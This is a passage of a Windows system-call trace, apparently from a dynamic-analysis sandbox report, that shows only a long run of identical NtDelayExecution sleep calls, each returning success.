(Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.755] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.756] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.758] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.759] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.761] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.762] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.764] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.765] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.768] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.769] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.770] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.772] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.773] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.775] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.776] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.778] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.779] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.781] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.784] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.785] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.786] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.788] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.789] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.791] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.792] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.794] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.795] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.797] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.798] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.801] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.802] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.804] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.805] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.807] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.808] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.811] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.812] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.813] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.815] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.816] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.819] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.820] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.822] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.823] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.825] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.826] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.828] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.829] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.831] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.832] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.834] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.835] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.838] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.840] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.841] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.843] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.844] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.846] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.847] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.849] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.850] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.852] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.853] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.855] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.856] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.858] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.862] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.863] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.865] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.866] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.868] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.869] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.871] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.872] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.874] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.875] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.877] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.878] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.880] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.884] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.885] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.887] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.888] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.890] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.891] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.893] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.894] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.896] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.897] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.899] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.900] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.902] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.903] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.907] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.908] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.911] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.912] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.913] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.915] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.916] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.918] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.919] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.921] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.922] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.924] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.925] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.927] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.936] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.937] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.939] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.940] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.942] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.943] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.945] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.946] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.948] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.949] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.951] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.952] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.956] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.957] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.959] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.960] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.962] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.963] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.965] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.966] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.968] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.969] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.971] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.972] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.974] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.975] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.977] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.978] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.983] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.984] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.986] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.987] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.989] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.990] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.992] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.993] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.995] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.996] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.998] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.999] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.001] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.002] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.004] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.005] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.009] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.012] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.013] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.014] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.016] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.017] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.019] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.020] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.022] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.023] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.025] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.026] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.028] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.029] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.066] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.102] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.136] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.185] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.220] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.262] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.296] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.331] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.378] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.417] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.454] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.462] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.464] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.465] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.467] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.468] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.470] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.471] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.473] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.474] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.476] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.477] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.479] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.480] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.482] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.483] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.485] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.486] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.488] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.489] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.495] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.496] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.498] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.499] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.501] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.502] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.504] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.505] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.507] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.508] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.510] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.511] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.513] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.515] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.516] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.518] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.519] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.521] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.523] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.525] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.526] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.528] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.529] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.531] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.534] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.536] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.537] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.539] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.540] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.542] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.543] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.545] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.546] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.548] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.549] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.551] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.552] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.554] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.555] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.557] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.558] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.560] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.561] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.563] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.564] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.566] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.567] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.569] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.570] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.572] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.573] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.579] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.581] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.583] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.584] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.586] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.587] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.589] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.590] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.592] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.593] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.595] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.596] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.598] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.599] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.601] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.602] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.604] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.605] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.607] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.608] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.610] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.611] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.613] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.614] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.616] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.617] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.619] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.625] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.626] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.628] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.632] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.634] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.635] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.637] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.638] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.640] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.641] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.643] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.644] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.646] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.647] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.649] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.650] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.652] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.653] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.655] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.656] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.658] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.659] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.661] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.662] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.664] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.665] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.667] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.668] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.670] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.671] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.673] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.674] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.676] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.677] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.679] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.680] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.682] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.683] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.685] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.686] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.688] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.689] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.691] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.692] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.693] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.695] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.696] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.698] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.699] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.701] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.702] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.704] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.705] NtDelayExecution 